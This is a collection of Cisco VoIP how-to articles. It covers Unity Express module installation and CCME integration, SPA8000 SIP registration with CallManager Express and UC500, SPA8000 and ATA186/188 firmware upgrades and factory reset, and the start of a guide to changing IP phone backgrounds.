2911-CCME(config-dial-peer)# session target ipv4:192.168.10.10
2911-CCME(config-dial-peer)# dtmf-relay rtp-nte
2911-CCME(config-dial-peer)# codec g711ulaw
2911-CCME(config-dial-peer)# no vad
2911-CCME(config-dial-peer)# exit
2911-CCME(config)#
2911-CCME(config)# ephone-dn  1
2911-CCME(config-ephone-dn)# number 800... no-reg both
2911-CCME(config-ephone-dn)# mwi on
2911-CCME(config-ephone-dn)# exit
2911-CCME(config)#ephone-dn  2
2911-CCME(config-ephone-dn)# number 801... no-reg both
2911-CCME(config-ephone-dn)# mwi off
2911-CCME(config-ephone-dn)#exit
2911-CCME(config)#

Now we must enable the IP HTTP and HTTP secure server and ensure the HTTP access lists (if any) allow logins from Unity Express’s IP address:

2911-CCME(config)# ip http server
2911-CCME(config)# ip http access-class 50
2911-CCME(config)# ip http authentication local
2911-CCME(config)# ip http secure-server
2911-CCME(config)# ip http timeout-policy idle 60 life 86400 requests 10000
2911-CCME(config)# ip http path flash:
2911-CCME(config)# access-list 50 remark -=[Control CUCME Web Access]=-
2911-CCME(config)# access-list 50 permit 192.168.9.0 0.0.0.255
2911-CCME(config)# access-list 50 permit host 192.168.10.10
2911-CCME(config)# access-list 50 remark

Failing to configure the above commands will result in Unity Express being unable to log into the CallManager Express system and therefore unable to complete its initialization process. In our setup, network 192.168.9.0 is the Data VLAN, whereas host 192.168.10.10 is our Unity Express IP address.
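
Before moving on, the HTTP server state and the applied access class can be double-checked (a verification sketch; output formatting differs between IOS releases):

2911-CCME# show ip http server status

The output should report the HTTP and HTTP secure servers as enabled and show access class 50 applied.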

Unity Express Module Administrator User Configuration

The final step involves logging into the Unity Express CLI and creating the admin user to be used for the web-based initialization process that follows:

2911-CCME# service-module ism 0/0 session

Trying 192.168.10.5, 2131 ... Open
**************************************************
The administrator user ID cannot be empty.
**************************************************
Enter administrator user ID:
  (user ID): admin    
Enter password for admin:
  (password):
Confirm password for admin by reentering it:
  (password):

SYSTEM ONLINE
se-192-168-10-10#
se-192-168-10-10# config terminal
Enter configuration commands, one per line.  End with CNTL/Z.
se-192-168-10-10(config)# hostname 2911-UnityExpress
2911-UnityExpress(config)# exit
2911-UnityExpress# wr
2911-UnityExpress# exit

Session closed

[Connection to 192.168.10.5 closed by foreign host]

We are now ready to connect to Unity Express and begin the module’s initialization.

Unity Express Web Interface Initialization & Configuration

Open a web browser and enter the IP address of the Cisco Unity Express module, in our case this is 192.168.10.10. The Unity Express is yet to be initialized and therefore will only allow administrator login.

Using the username and password entered above, we log in to the Unity Express administration panel:

Upon logon, we need to select the appropriate Call Agent Integration from the drop-down menu, in our case Cisco Unified Communication Manager Express:

unity express initialization installation wizard

After the selection, the system will warn that it will delete JTAPI-related configuration and reboot. Do not be alarmed; click on OK to continue:

cisco unity express installation

If you’re connected to the Unity Express CLI, you’ll also be able to view the whole reboot process. Here is the session we captured during this reboot:

MONITOR SHUTDOWN...
INIT: Sending processes the TERM signal
Rebooting ...
shutdown: sending all processes the TERM signal...
platform.config:    INFO platform.config server output END
trace:    INFO trace daemon output END
rbcp:    INFO rbcp daemon output END
shutdown: sending all processes the KILL signal.
shutdown: turning off swap
shutdown: unmounting all file systems
Please stand by md: stopping all md devices.
while rebooting the system.
ACPI: PCI interrupt for device 0000:01:00.0 disabled
ACPI: PCI interrupt for device 0000:01:01.0 disabled
Restarting system.
Aug 12 11:39:31.024: %LINEPROTO-5-UPDOWN: Line protocol on Interface ISM0/1, changed state to down
Aug 12 11:39:31.056: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to down
Initializing memory. Please wait...
Memory initialization OK. Continue...
Aug 12 11:39:40.080: %LINEPROTO-5-UPDOWN: Line protocol on Interface ISM0/1, changed state to up
DDR Memory 0512 MB detected
Genuine Intel(R) processor              1.06GHz
BIOS ISM 2.6,  BIOS Build date: 10/16/2009
System now booting...
Authenticating boot loader....  
Secondary Boot Loader authenticated - booting....  
Please enter '***' to change boot configuration:
Detect and Initialze network device
Backup current platform configurations....
SRE step 1 - SM registration...
Response - no installation needed (len: 422)
SRE Installation Not Needed
Restoring orignial configuration...
Updating flash with bootloader configuration.
Please wait .................. done.
Loading disk:/bzImage ...
Aug 12 11:39:58.512: %SM_INSTALL-6-INST_RBIP: ISM0/0 received msg: RBIP Registration RequestVerifying ... done.
Starting Kernel.
Platform: ism
sd 0:0:0:0: [sda] Assuming drive cache: write through
sd 0:0:0:0: [sda] Assuming drive cache: write through
Verifying application level programs
Application level programs verification OK!
INIT: version 2.86 booting
mounting proc fs ...
mounting sys fs ...
mounting /dev/shm tmpfs ...
reiser root fs ...
Reiserfs super block in block 16 on 0x801 of format 3.6 with standard journal
Blocks (total/free): 1002928/899804 by 4096 bytes
Filesystem is clean
Filesystem seems mounted read-only. Skipping journal replay.
Checking internal tree..finished
Aug 12 11:40:10.080: %LINEPROTO-5-UPDOWN: Line protocol on Interface Vlan1, changed state to up
FILESYSTEM CLEAN
Remounting the root filesystem read-write...
kernel.sem = 1900 4000 32 100
vm.overcommit_memory = 1
                Welcome to Cisco Service Engine
Setting the system time from hardware clock
********** rc.aesop ****************
Populating resource values from /etc/ism_rsrc_file
Populating resource values from /etc/default_rsrc_file
Populating resource values from /etc/products/cue/default_rsrc_file
Populating resource values from /etc/products/cue/ism_rsrc_file
WARNING: Found files describing previous failures...
         Saving them as /var/javacores/*.prev
Processing manifests . . . . . . . . . . . . . complete
==> Management interface is eth0
==> Management interface is eth0
Serial Number: FOC162427RV
INIT: Entering runlevel: 2
********** rc.post_install ****************
INIT: Switching to runlevel: 4
INIT: Sending processes the TERM signal
==> Starting CDP
STARTED: ntp_startup.sh
STARTED: LDAP_startup.sh
STARTED: SQL_startup.sh
STARTED: dwnldr_startup.sh
STARTED: HTTP_startup.sh
STARTED: probe
STARTED: fndn_udins_wrapper
STARTED: superthread_startup.sh
STARTED: /usr/wfavvid/run-wfengine.sh
STARTED: /usr/bin/launch_ums.sh
 Waiting 74 ...
SYSTEM ONLINE

2911-UnityExpress#

While Unity Express reboots, the GUI shows a message explaining that the system is reloading and will automatically try to reconnect once the reboot cycle is complete:

cisco unity express reboot

When the system is back online it is necessary to log back in using the Unity Express administrator account previously created (admin).

After the logon process is complete, we are presented with the CUCME Logon screen. On this screen we provide the credentials Unity Express uses to log on to CCME and obtain the user account configuration. This is the same account created under the Telephony-Service section of CCME (shown previously). We also provide the hostname or IP address of CCME; we selected the IP address of the Voice VLAN, 192.168.10.5:

cisco unity express cme login credentials

In case of logon failure, Unity Express will present a pop-up window explaining that it failed to log on. In such a case, check the CCME web user under telephony-services and ensure the rest of the required commands are present.

As soon as Unity Express’s login to CCME is complete, it will present all users it finds and allow the administrator to associate the Primary Extension for each one. Here, you can also enable Mailbox creation, set a specific user as an Administrator or set CFNA/CFB (Call Forward No Answer / Call Forward Busy) so that incoming calls to the user are directed to his/her voicemail when not answered or busy:

cisco unityexpress import users

Clicking on Next takes us to the Defaults page where default settings are configured for all new users and mailboxes created from now on. Ensure the System Default Language is set to English (in most cases) and take note of the Password & PIN Options.  The rest can be changed as required:

cisco unityexpress pin configuration

The next page covers the handling of calls to Unity Express. Here you set the Voice Mail Number; this same number should be configured under Telephony-Service in CallManager Express (covered earlier in this article). MWI ON/OFF should be automatically configured; if not, select the correct extensions configured earlier.  SIP MWI should be left at its default unless there is a reason to change it:

cisco unityexpress call handling

A final screen is presented where there is an option to finalize the configuration and save it to the Unity Express startup-config. Review as necessary and click on Finish to begin the process:

cisco unityexpress configuration summary

As the saving of the configuration is in progress, Unity Express executes a number of scripts in the background and makes the necessary modifications. An update of this progress is shown on the web browser screen:

cisco-unityexpress-p2-12

Finally, Unity Express will present a summary of the setup and inform the administrator of all successes and failures:

cisco unityexpress status

In our example, Unity Express failed to create and allocate a voice mailbox to our user due to the absence of an active mailbox license.

Unity Express licensing will be covered in a separate article, along with more details and information.

This completes our two-part article covering the physical installation of the ISM-SRE-300 and SM-SRE-700 Service-Ready Engine (SRE) modules with Unity Express 8.0.


Cisco Unity Express Installation & Setup - ISM-SRE-300-K9 & SM-SRE-700-K9 Installation – Part 1

Unity Express is a popular add-on for Cisco Unified Communication Manager Express (CallManager Express) and Cisco Unified Communication Manager (CUCM), adding advanced auto attendant functionality with complex menu support through Unity Express voice scripts, user voice mail and advanced notification methods such as emailing voice messages directly to users, calling users to notify them about their new voice messages and much more.

Users interested can also visit our Cisco VoIP/CCME - CallManager Section where they'll find more articles covering Cisco VoIP, CallManager, CallManager Express and Unity Express.

Cisco Unity Express Hardware Platforms

Unity Express is offered on a variety of hardware platforms supporting the Cisco 2800, 3800, 2900 and 3900 series routers. Depending on the router and capacity required, Unity Express is available in the following form factors:

  • Advanced Integration Module (AIM) card for the 2800 and 3800 series
  • Internal Service Module (ISM) for the 2900 and 3900 series
  • Network Module (NM-CUE-EC) for the 3700, 2800 and 3800 series routers that support network modules
  • Enhanced Network Module (NME) for all 3700, 2800, 3800, 2900 and 3900 series routers supporting network modules
  • The newer Service Module (SM), supported only on ISR G2 routers (2900 and 3900 series) that are able to accept network modules

The following link contains a table of the available Unity Express hardware modules, and supported platforms:

We were lucky to get our hands on two different Unity Express modules, the ISM-SRE-300-K9 installed on a Cisco 2911 CCME, and the larger SM-SRE-700-K9 installed into a Cisco 3945 CCME.

The following table shows the technical specifications of both ISM-SRE-300-K9 & SM-SRE-700-K9:

Feature                                                         | Cisco SRE 300 ISM                     | Cisco SRE 700 SM
Form Factor                                                     | Internal Service Module (ISM)         | Service Module (SM)
CPU                                                             | Intel Processor 1.06Ghz               | Intel Core 2 Solo, 1.86Ghz
DRAM                                                            | 512MB                                 | 4GB
Compact Flash Memory                                            | 4GB internal USB Flash-memory module  | 2GB internal USB flash-memory module
Hard Disk                                                       | None                                  | One 500GB SATA 5400rpm HDD
Mailboxes Supported                                             | 100                                   | 500
Concurrent Voicemail and Automated-Attendant Ports and Sessions | 10                                    | 32

Meet The ISM-SRE-300-K9

While the configuration procedure for both modules is identical, physically there are many differences that cannot be overlooked.

cisco-voice-ue-ISM-SRE-300-K9

The ISM-SRE-300 is the smallest internal module available for the newer ISR G2 routers but certainly does not hold back in performance or capabilities. With support for 100 mailboxes and up to 10 concurrent voice ports, it is capable of delivering enterprise-class services.

As an ISM module, it is installed by opening the router’s lid and connecting it to the special ISM port located on the back-left area of the main board (or front-right area, depending on which way the router is facing). On our Cisco 2911 ISR G2 CallManager Express router, we've marked the ISM connector in yellow in the picture below:

cisco 2900 motherboard and connectors

In the picture above, we see our Cisco 2911 router, open and ready to accept the ISM module. Note that there is only one ISM connector on the main board, which means you can only install one ISM module.

With every ISM module, Cisco provides 4 hex metal M-F standoffs to be placed in the area circled in red.  To install them, it is necessary to remove the factory screws and replace them with the hex metal M-F standoffs. Finally, after the ISM-SRE-300 is in place and connected, use the screws to tighten the board against the standoffs.

This is what the 2911 router looks like inside, after the ISM-SRE-300 is firmly placed in its position and secured with the necessary screws:

cisco 2901 2911 motherboard connects & ISM module

We’ve also added a few more items, including a High-Density Packet Voice Video Digital Signal Processor Module (PVDM3-16) and three VIC2 cards used to connect to the public switched network (ISDN and PSTN lines).

Meet The SM-SRE-700-K9

The SM-SRE-700-K9 is the big SM brother, targeted at larger enterprises with support for up to 500 mailboxes and expandable to 32 concurrent voice ports. Looking at the picture we took during the installation, it is evident we are talking about a whole server on a single board – the only thing missing is a VGA card!  The SM-SRE-700-K9 is capable of running the VMware vSphere Hypervisor and hosting virtual machines running one or more Windows Server operating systems!

cisco  SM-SRE-700-K9 network module

The system’s hard disk drive is visible in the lower right area and next to it there is an empty slot ready to accept a second disk drive. On the left is the system’s DRAM – 4GB in total (2x2GB) – and we suspect the central processor is located to the right of the DRAM, as there’s a sticker right behind the empty HDD slot warning that the heat sink gets hot.

Installing the SM-SRE-700-K9 is a lot simpler as it does not require opening the router to access its mainboard. Simply locate an empty SM slot, remove the blank plate and insert the SM-SRE-700-K9 inside:

SM-SRE-700-K9 installation

 Once neatly tucked in its place, we are ready to power up the Cisco 3945 router and begin the setup.

cisco cme 3945 installation

 Next: The second part of our Unity Express installation guide.  Part-2 covers the initial configuration of CallManager Express necessary to establish communication with the Unity Express module, IP configuration, initialization of the setup procedure, plus much more.

The article provides step-by-step instructions with all necessary details and as always includes screenshots of the setup process.  Click here to read Part-2 of our Unity Express Setup/Installation.

 


Cisco CallManager Express CME v8.8 & v9.0 GUI Web Interface Bug

Cisco's CallManager Express GUI interface is an important part of the CallManager Express product as it provides the ability to administer CME via a web browser. Generally, the CME GUI interface is extremely useful as it helps save valuable time to setup new IP Phones or make changes to an existing setup.

On the other hand, the CME GUI interface can also prove to be a big waste of time, that is, if you're trying to install CME GUI versions 8.8 or 9.0.

Wondering why? 

Simply put, there is a massive bug in these two CME GUI versions that renders the whole web interface useless.  We spent valuable time trying to troubleshoot a very weird problem: after installing and setting up the web interface, we couldn't make any changes to the IP phones, extensions or any functionality supported by the GUI interface!

When trying to save our changes, the system would return to the main menu, totally ignoring the changes and without saving anything!

After much frustration trying different IOS images and GUI interfaces, we contacted Cisco so they could shed some light and help us diagnose the problem.

To our surprise, the problem was a bug-related issue which is yet to be fixed!  The only workaround, if you require a functional administrative web interface, is to downgrade to CME IOS 151-4.M4 (15.1(4)M4) and GUI version 8.6.

The sad part of this story is that Cisco has failed to place any notice in their relevant download section, so engineers are downloading GUI files for CME versions 8.8 and 9.0, without any clue of what's to come!  As a result, thousands of cases have been opened with Cisco, all around the same problem.

The Bug ID assigned to this issue is CSCtz35753, but don't bother searching for more information on it; Cisco is not disclosing any information at this point in time - it's top secret!

cisco-voice-cme-gui-bug-CSCtz35753


Connecting & Configuring SPA8000 with UC500, 520, 540, 560 & CallManager Express (CCME) - Low Cost FXS Analog Ports

When it comes to connecting multiple analog phones to VoIP systems like Cisco’s Unified Communication Manager Express (CallManager Express) or UC500 series (Includes UC520, UC540, UC560), the first thing that usually comes to mind is the expensive ATA 186/188 or newer ATA 187 devices (double the price of the older 186/188) that provide only two FXS analog ports per device.

While purchasing one or two ATA devices might be acceptable for up to two or four analog phones, this quickly becomes a very expensive practice for any additional FXS ports. Thankfully, there is a cheaper solution – the Cisco Linksys SPA8000.

The Cisco SPA8000 is an 8-port IP Telephony Gateway that allows connections for up to eight analog telephones (provides 8 FXS ports) to an IP-based data network. What many engineers are not aware of is that the SPA8000 can also be configured to connect to Cisco's CallManager Express or Cisco UC500 series IP Telephony system, decreasing dramatically the cost per FXS analog port of your VoIP network.

This article examines the necessary steps and configuration required to successfully connect a SPA8000 to a CallManager Express system.  The commands covered are identical to CallManager Express and all UC 500 series IP PBX systems (520, 540 & 560).

cisco-voice-uc500-ccme-spa8000-1

The diagram above shows the physical connection of the solution. The SPA8000, just like any VoIP device, is configured and connected to a network switch and assigned to VLAN2, the Voice VLAN in our example. By doing so, the SPA8000 is able to communicate with CallManager Express using the SIP Protocol as shown below.  On the back of the SPA8000, we've connected simple analog phones to FXS ports provided. These phones can be placed in areas where there is no need for the more expensive Cisco IP Phones, usually public areas, production environments etc.  Note that these analog phone devices can also be wireless analog phones.

Upgrading The Cisco SPA8000 Firmware

We highly recommend upgrading the SPA8000 to the latest available firmware version. This practice usually provides new features and greater stability of the unit. This simple-to-follow process has been extensively covered in our Cisco SPA8000 Firmware Upgrade article.

Configuring The SPA8000 IP Address

To avoid network problems, it is important to ensure the SPA8000 is configured to be in the same network as the CallManager Express or UC500 – in other words, the same (Voice) VLAN.  In the SPA8000 Network -> WAN Status tab, always ensure the Connection Type is set to Static and an appropriate IP Address, Gateway and DNS Server are provided:

cisco-voice-uc500-ccme-spa8000-3

Configuring The SPA8000 FXS Ports For SIP Registration With CallManager Express / UC500, UC520, UC540, UC560

On the main Voice configuration tab, the SPA8000 lines are configured on tabs L1 through L8.  To enable a line, for example L1 which corresponds to FXS port 1, click on the L1 tab and set Line Enable to YES:

cisco-voice-uc500-ccme-spa8000-4

 Next, we need to configure the following settings:

  • Proxy:  IP Address of our CCME or UC500 series IP PBX
  • Register: Enable registration of the line with CallManager Express or UC500
  • Make/Ans Call Without Reg: Always force the line to be registered with CCME or UC500 to place or answer a call
  • Display Name:  Caller ID for the extension. This is the Caller ID other extensions will see when we dial from this line
  • User ID: The line’s extension number e.g 139
  • Auth ID & Password:  Username and password combination for this line.  We use cisco / firewallcx
  • Use Auth ID: Enable authentication for this line.

It is important to note that the same Auth ID & Password is used for all configured lines, that is, L1 through L8.

cisco-voice-uc500-ccme-spa8000-5

At this point, we have completed the SPA8000 configuration and are ready to move to CallManager Express or UC500 configuration.

Configuring CallManager Express & UC500 (UC520, UC540, UC560) SIP Registration For SPA8000

On the CallManager Express side, the SIP CME feature is used to register the SPA8000 as a generic SIP endpoint, allowing each configured line (on the SPA8000) to register with CCME.

First, we create a voice class codec that will define the voice codecs that can be used by CallManager Express and SPA8000:

CCME(config)# voice class codec 1
CCME(config-class)# codec preference 1 g711ulaw
CCME(config-class)# codec preference 2 g729r8

Next, we enable the SIP registrar server on our CallManager Express:

CCME(config)# voice service voip
CCME(conf-voi-serv)# sip
CCME(conf-serv-sip)#  registrar server
CCME(conf-serv-sip)#  exit

Now we need to define the global voice register parameters:

CCME(config)# voice register global
CCME(config-register-global)# mode cme
CCME(config-register-global)# source-address 10.10.100.10 port 5060
CCME(config-register-global)# max-dn 10
CCME(config-register-global)# max-pool 10

The source IP Address used here is that of the CallManager Express or UC500 Voice VLAN interface.

Now configure the extension number for each FXS port on our SPA8000:

CCME(config)# voice register dn  1
CCME(config-register-dn)# number 139
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  2
CCME(config-register-dn)# number 140
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  3
CCME(config-register-dn)# number 141
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  4
CCME(config-register-dn)# number 142
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  5
CCME(config-register-dn)# number 143
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  6
CCME(config-register-dn)# number 144
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  7
CCME(config-register-dn)# number 145
CCME(config-register-dn)# no-reg
CCME(config-register-dn)# voice register dn  8
CCME(config-register-dn)# number 146
CCME(config-register-dn)# no-reg

Finally, we must create a registration pool for our SPA8000 lines. One pool only is required. Note that the MAC Address configured is that of our SPA8000:

CCME(config-register-dn)# voice register pool  1
CCME(config-register-pool)# id mac 687F.7459.85EC
CCME(config-register-pool)# number 1 dn 1
CCME(config-register-pool)# number 2 dn 2
CCME(config-register-pool)# number 3 dn 3
CCME(config-register-pool)# number 4 dn 4
CCME(config-register-pool)# number 5 dn 5
CCME(config-register-pool)# number 6 dn 6
CCME(config-register-pool)# number 7 dn 7
CCME(config-register-pool)# number 8 dn 8
CCME(config-register-pool)# dtmf-relay rtp-nte
CCME(config-register-pool)# voice-class codec 1
CCME(config-register-pool)# username cisco password firewallcx
CCME(config-register-pool)# no vad

The number 1 dn 1 command configures the extension assigned to Line 1 / FXS Port 1. Likewise, the number 2 dn 2 command configures the extension assigned to Line 2 / FXS Port 2, and so on. Lastly, note the username and password combination used for all lines.

At this point, the configuration is complete and the SPA8000 should start registering its 8 lines to CallManager Express.

Directory numbers assigned to the SPA8000 (139 through 146 in our example) should not be assigned as directory numbers to other IP Phones.

If we pick up a Cisco IP Phone and dial extension 139, the analog phone connected to Line 1 on our SPA8000 should ring.

Allowing Direct Transfers To SPA8000 Extensions

When using the SPA8000 most engineers are faced with a common problem:  Incoming calls cannot be transferred to the extensions assigned to the SPA8000’s lines. 

For example, we have an incoming call answered by the receptionist.  The receptionist now needs to transfer the call to extension 139, so they press the Transfer button, enter 139 and receive a beeping busy signal, even though extension 139 is on-hook (not in a call).

This is because extensions 139 through 146 are not directly registered with the Cisco CallManager system using the SCCP  (Skinny) protocol as normal Cisco IP Phones usually are. Extensions 139 through 146 are registered via SIP Protocol and are handled differently.

To overcome the direct transfer limitation described, we need to instruct the CallManager Express to allow the transfer of calls to the extensions assigned to our SPA8000’s lines. 

The configuration below enables direct transfers to all SIP extensions configured in our example setup:

CCME(config)# telephony-service
CCME(config-telephony)# transfer-pattern 139
CCME(config-telephony)# transfer-pattern 140
CCME(config-telephony)# transfer-pattern 141
CCME(config-telephony)# transfer-pattern 142
CCME(config-telephony)# transfer-pattern 143
CCME(config-telephony)# transfer-pattern 144
CCME(config-telephony)# transfer-pattern 145
CCME(config-telephony)# transfer-pattern 146

This completes the configuration of CallManager Express and UC500 series IP PBX systems to allow the connection and registration of Cisco SPA8000 in order to provide a cheap alternative for analog FXS ports.




How To Upgrade Cisco - Linksys SPA8000 Firmware

The Cisco - Linksys SPA8000 is an 8-port IP Telephony Gateway that allows connections for up to eight analog telephones (provides 8 FXS ports) to a VoIP network using the Session Initiation Protocol (SIP).

This article covers extensively the upgrade process of the Cisco SPA8000 firmware so it can run the latest available version.

Upgrading The Cisco Linksys SPA8000 Firmware

Before any configuration is performed on the Cisco SPA8000, it is important to proceed with the upgrade of its firmware to the latest available version. At the time of writing, the latest firmware release was 6.1.10 (001), dated 6th May 2011 – filename SPA8000_6.1.10.zip.  To save time and trouble, we’ve also made the firmware available in our Cisco Downloads section.

Upgrading the SPA8000 firmware is a very simple process. Download and unzip the provided file (2.13MB). Inside, we will find 3 files:

cisco-voip-spa8000-upgrade-1

The spa8000-6-1-10-001.bin file is the firmware that will be loaded on to the SPA8000, the spa8000_rn_v6-1-10.pdf contains the release notes and upg-spa8000-6-1-10-001.exe is the firmware upgrade program.

At this point, we run the upg-spa8000-6-1-10-001.exe executable and are presented with a window similar to this one:

cisco-voip-spa8000-upgrade-2

At this point, we enter the IP Address of the SPA8000 to be upgraded, in the provided field and click on OK. The application provides the ability to select a different source IP Address in case there are multiple network interface cards or multiple IP Addresses bound to the workstation. 

It is possible that a username and password will be requested by the program so it can log into the SPA8000, so we need to ensure this information is available before the upgrade process begins.

Once the firmware upgrade has successfully completed, the SPA8000 will reboot, resetting the device to its default settings.  Note that the SPA8000 default IP Address will be 192.168.0.1, default username admin and no password.

As soon as the SPA8000 reboots with its new firmware, we can enter the web administration and configure the necessary IP Address, subnet mask, default gateway and DNS servers.

The screen below confirms the firmware upgrade and settings:

cisco-voip-spa8000-upgrade-3

This concludes our article covering how to upgrade the firmware on a Cisco - Linksys SPA8000 device.


How to Upgrade - Update Cisco ATA186 / 188 Firmware and Reset to Factory Default

The Cisco ATA 186/188 device is well known amongst Cisco VoIP engineers. It is used to allow analog phone devices to connect to the VoIP network and function as they normally would with any other PBX.  The Cisco ATA 186/188 was (and still is) one of the most useful (and cheapest) devices for any VoIP network.  Many companies use the Cisco ATA in areas such as production lines and public areas, where expensive Cisco IP Phones are not required.

As noted, there are two different models, the Cisco ATA 186 and 188. One of the major differences between the two is that the Cisco ATA 188 has two RJ-45 10/100Mbps Ethernet ports, whereas the Cisco ATA 186 has only a single 10Mbps Ethernet port. One of the ports on the Cisco ATA 188 is an uplink port (connects to the switch), and the other is a data port, allowing you to connect another network device, e.g. a workstation or network printer, just as you would with a Cisco IP Phone that has two Ethernet ports, e.g. the Cisco 7911G, 7945G, etc.

cisco-voice-ata186-188

Both models have two FXS interfaces (shown above, on the right side behind each ATA) which are used to connect two standard analog telephones or fax machines. The Cisco ATA is connected to the network via an Ethernet interface (uplink port) and can be configured via DHCP or manually. The Cisco ATA needs a 5V DC external power supply to operate. It is important to add that the Cisco ATA 186 and 188 devices do not support inline Ethernet power or Power over Ethernet (PoE).

Upgrading the Cisco ATA 186 - 188 Firmware

As with most IP Phones and VoIP network devices, the Cisco ATA firmware should be periodically updated to the latest available version. This will help ensure smooth operation and most importantly, fix any bug issues that might be present in older firmware versions.

Upgrading the Cisco ATA firmware is a fairly straightforward process and won't require too much effort, as long as all the described steps are followed. At the time of writing this article, the latest available firmware for the Cisco ATA 186 - 188 is version 3.2(4) (file name ata_03_02_04_sccp_090202_a.zip) with release date 23/2/2009.  For the purpose of this article, this image has been made available from our Cisco IP Phone & ATA Firmware Download section. It is important to note that the upgrade procedure is the same for the SCCP (Skinny protocol), SIP and H.323 firmware.

First, download and unzip the file into a directory, preferably c:\ata.  The zip file contains 32 files, of which two are the ones we are mostly interested in:

- sata186us.exe (72Kb): This executable will serve the firmware to the ATA so the ATA can fetch and install it.
- ATA030204SCCP090202A.zup (273Kb): This is the firmware file for the ATA device.

To begin, open a DOS prompt and switch to the directory where you have unzipped the downloaded zip file. We assume this is the C:\ata directory. Once there, run the sata186us.exe executable with the following parameters:

c:\ata>sata186us -any -d1 ATA030204SCCP090202A.zup

Note: To complete the ATA firmware upgrade, we will require an analog phone connected to the Phone 1 port of the Cisco ATA device. The phone will be used later on to initiate the firmware upgrade.

This command will start the server and begin serving the firmware file to any ATA that connects to it. The -any parameter will allow the upgrade even if the software version is less than or equal to that of the client box. The -d1 parameter sets the verbose level for debugging to 1 (out of 3). This is handy as the server will provide enough debug output to allow tracking of the process.

Once the above command is executed, the server will begin serving the firmware file to any ATA that requests it. The service listens on UDP port 8000 and the data stream (transfer of firmware) uses UDP port 8500, so it is important these ports are not blocked by any firewall or antivirus system, or else the upgrade will fail.

Following is the output when running the sata186us executable as shown above:

sata186us version 3.1
Using Host: Firewall-cx with IP: 10.0.0.90 as upgrade server
This machine IP: 10.0.0.90
Upgrade Server Port: 8000
Data stream 0 port: 8500
        image found: code -- ata186.itsp2.v3.2

Using dialpad of your telephone (attached to your ATA box),
press ATA button to go to main menu, and enter:

        100#10*0*0*90*8000#     (to upgrade code)

NOTE:
Pressing 123# will announce your code's version number.
You can later verify that you have upgraded your ATA box.

-------------------------------------------

This program runs continuously; Press <ctrl>-c to abort.
Upgrade server ready...

The most important areas have been highlighted for your attention. The server will automatically detect and display the workstation's IP address on which it will listen for incoming connections, followed by the ports used to listen and transfer the data stream (firmware).

At this point, we need to turn to the Cisco ATA device, pick up the handset and press the ATA button on the top. This button lights red when the handset goes to an 'offhook' status, i.e. the handset is picked up.  Once the red ATA button is pressed, dial the sequence shown below and keep the handset to your ear:

100#10*0*0*90*8000#

Note that the 10*0*0*90 portion of the code represents our workstation's IP address (10.0.0.90) with the dots replaced by asterisks, so this will need to be substituted with your own workstation's IP address.
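
For example, if the workstation running the upgrade server had the hypothetical address 192.168.1.50, the dialpad sequence would become:

100#192*168*1*50*8000#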

As soon as the upgrade sequence is entered via the dialpad, the ATA will initiate the firmware transfer and proceed with the upgrade.  During this time, expect debug output on the screen, similar to the following:

Wed Nov 16 12:49:19 2011 10.0.0.21      -> <udp: 10.0.0.90 8500 123>
Begin uploading code to 10.0.0.21 (Wed Mar  30 12:49:19 2012) ...
Done uploading code to 10.0.0.21 (Wed Mar 30 12:49:22 2012)


The firmware transfer should not take more than 10-15 seconds and, once successful, you will hear the announcement "Upgrade Successful". It's a good idea at this point to reboot the Cisco ATA device and let it boot with the new firmware.

Checking and Verifying the Cisco ATA 186 - 188 Firmware Version

To verify or find out your current ATA firmware version, simply follow these easy steps:

1) Take the phone off hook.
2) Press 123# and listen to the announcement. You will hear your code's version number.
3) Hang up the phone.

Resetting The Cisco ATA 186 - 188 Device To Factory Default

The Cisco ATA device offers a simple mechanism to perform a factory default reset, wiping clean all configuration changes that might have been made through the web administrative interface.

To perform a factory reset of a Cisco ATA 186 - 188, follow the steps below:

1) Take the phone off hook.
2) The red button on the top of the ATA-186 / 188 will illuminate.
3) Press the illuminating red button on the ATA and dial 322873738#. (The numbers spell FACTRESET# on the telephone)
4) Voice prompt will ask you to dial * to save changes you have just made.
5) Press * on your phone's keypad.
6) Hang up the phone.

The Cisco ATA will now reset to its factory defaults.


CallManager Express & UC500 Series: Changing Background Images on a Cisco IP Phone

Cisco's CallManager Express (Cisco router platform & UC520, UC540 & UC560) offers a number of customisation features that allow the CCME administrator to customise the system to suit the customer's needs.

One popular feature is the ability to change the IP Phone's background image for IP Phones with colour or black/white LCD displays. This feature helps give a new look to the IP phone and usually comes as a pleasant surprise to the end users.

IP Phone background images are files using the .png format and are stored on the router's flash memory in a special directory named 'Desktops'.

Cisco usually provides a .zip file for each CallManager Express version. This file contains IP Phone firmware, ringtones, the GUI interface and more (links to the download pages can be found in our CCME GUI Software Installation & Configuration article). Within each CCME zip file, you'll find a file named 'backgrounds.tar' which contains a total of six colour backgrounds to start you off with.

Firewall.cx has made the Cisco IP Phone 'backgrounds.tar' file & custom Firewall.cx background image, available in our Cisco IP Phone Software download section.

Following are thumbnails of the backgrounds provided by Cisco. These are the background images found in 'backgrounds.tar':

tk-cisco-ccme-ipphone-bgnd-1 tk-cisco-ccme-ipphone-bgnd-2tk-cisco-ccme-ipphone-bgnd-3  tk-cisco-ccme-ipphone-bgnd-4  tk-cisco-ccme-ipphone-bgnd-5  tk-cisco-ccme-ipphone-bgnd-6

Below is the standard background image loaded on every 7945, 7965, 7970 & 7975 IP Phone:

tk-cisco-ccme-ipphone-bgnd-7

Installing the background images is a straight forward process. All that's required is to extract the 'backgrounds.tar' file directly on to the router's flash and make them available to your IP phones via the router's TFTP server.

Step 1 - Extracting the Files on to the Router's Flash

Note that there must be a TFTP server running on the workstation from where the 'backgrounds.tar' file will be uploaded and extracted to the router. Enter the command to extract the 'backgrounds.tar' file from the TFTP server directly onto the router's flash. This will also create the directory structure contained in the .tar file:

R1# archive tar /xtract tftp://10.0.0.10/backgrounds.tar flash:
Loading backgrounds.tar from 10.0.0.10 (via FastEthernet0/0): !
Desktops/ (directory)
Desktops/320x212x12/ (directory)
extracting Desktops/320x212x12/CampusNight.png (131470 bytes)
extracting Desktops/320x212x12/CiscoFountain.png (80565 bytes)
extracting Desktops/320x212x12/CiscoLogo.png (8156 bytes)
